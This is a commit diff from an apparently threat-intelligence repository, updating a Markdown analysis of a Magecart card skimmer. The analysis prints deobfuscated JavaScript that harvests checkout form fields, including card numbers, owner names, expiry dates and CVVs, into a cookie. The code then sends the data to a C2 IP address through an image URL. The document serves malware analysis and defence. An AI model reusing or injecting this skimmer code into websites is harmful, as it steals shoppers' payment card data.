ch0ic3/CyberThreatIntel
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update Analysis.md

Browse Source
This commit is contained in:
StrangerealIntel 2020-06-02 21:35:58 +02:00 committed by GitHub
parent 51c54f3ad9
commit b439fe3e12
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 71 additions and 71 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

42
Additional Analysis/Magecart/2020-06-02/Analysis.md
View File

@ -265,18 +265,18 @@ function Push_Cookie(v){document["cookie"]= v+ "=; expires=Thu, 01 Jan 1970 00:0
<h6>The main function executed begins to crawl all the fields of the pages and add to the cookie the data.</h6>
```js
function main()
function main()
{
var b=document["getElementsByTagName"]("button");
for(i= 0;i< b["length"];i++)
{
b[i]["addEventListener"]("click",function()
{
var Data="";
var f=document["getElementsByTagName"]("form");
document["cookie"]= "mage_stats="+ "$"+ "; path=/";
for(z= 0;z< f["length"];z++)
{
var Data="";
var f=document["getElementsByTagName"]("form");
document["cookie"]= "mage_stats="+ "$"+ "; path=/";
for(z= 0;z< f["length"];z++)
{
var inp=f[z]["getElementsByTagName"]("input");
var elements=f[z]["getElementsByTagName"]("select");
for(x= 0;x< inp["length"];x++)
@ -316,31 +316,31 @@ for(z= 0;z< f["length"];z++)
}
}
}
};
};
```
<h6>The last part of the code is to replace the value of before send to the C2 by URL requests, this time in using the creation of an img element, by the url of the img, send the data to theirs C2 domains. This time, this doesn't remove the cookie in the cache and keep it.</h6>
```js
Data= Push_Data("mage_stats");
Data= Data["replace"]("card[num]","cc_number");
Data= Data["replace"]("card[name]","cc_owner");
Data= Data["replace"]("card[exp]","authorizenet_expiration");
Data= Data["replace"]("payment[ccw_exp_year]","authorizenet_expiration_yr");
Data= Data["replace"]("card[cvv]","cc_cid");
Data= Data["replace"]("payment[ps_cc_number]","cc_number");
Data= Data["replace"]("payment[ps_cc_owner]","cc_owner");
Data= Data["replace"]("payment[ps_cc_exp_month]","authorizenet_expiration");
Data= Data["replace"]("payment[ps_cc_exp_year]","authorizenet_expiration_yr");
Data= Data["replace"]("payment[ps_cc_cid]","cc_cid");
if(Data["indexOf"]("cc_number")!== -1|| Data["indexOf"]("cc_cid")!== -1|| Data["indexOf"]("cvv")!== -1|| Data["indexOf"]("cardno")!== -1|| Data["indexOf"]("ccNo")!== -1|| Data["indexOf"]("securityCode")!== -1|| Data["indexOf"]("cardNumber")!== -1|| Data["indexOf"]("numero_cartao")!== -1)
{
Data= Push_Data("mage_stats");
Data= Data["replace"]("card[num]","cc_number");
Data= Data["replace"]("card[name]","cc_owner");
Data= Data["replace"]("card[exp]","authorizenet_expiration");
Data= Data["replace"]("payment[ccw_exp_year]","authorizenet_expiration_yr");
Data= Data["replace"]("card[cvv]","cc_cid");
Data= Data["replace"]("payment[ps_cc_number]","cc_number");
Data= Data["replace"]("payment[ps_cc_owner]","cc_owner");
Data= Data["replace"]("payment[ps_cc_exp_month]","authorizenet_expiration");
Data= Data["replace"]("payment[ps_cc_exp_year]","authorizenet_expiration_yr");
Data= Data["replace"]("payment[ps_cc_cid]","cc_cid");
if(Data["indexOf"]("cc_number")!== -1|| Data["indexOf"]("cc_cid")!== -1|| Data["indexOf"]("cvv")!== -1|| Data["indexOf"]("cardno")!== -1|| Data["indexOf"]("ccNo")!== -1|| Data["indexOf"]("securityCode")!== -1|| Data["indexOf"]("cardNumber")!== -1|| Data["indexOf"]("numero_cartao")!== -1)
{
var result={referer:document["URL"],tag:"YTE4MWE2MDM3NjljMWY5OGFkOTI3ZTczNjdjN2FhNTE=",stats:btoa(Data["hexEncode"]())}; // YTE4MWE2MDM3NjljMWY5OGFkOTI3ZTczNjdjN2FhNTE= -> a181a603769c1f98ad927e7367c7aa51
u= "http://45.197.141.250/analytics.php?statistics_hash="+ btoa(JSON["stringify"](result));
var s=document["createElement"]("IMG");
s["src"]= u;
Push_Cookie("mage_stats");
}
}
})}
}main()})
```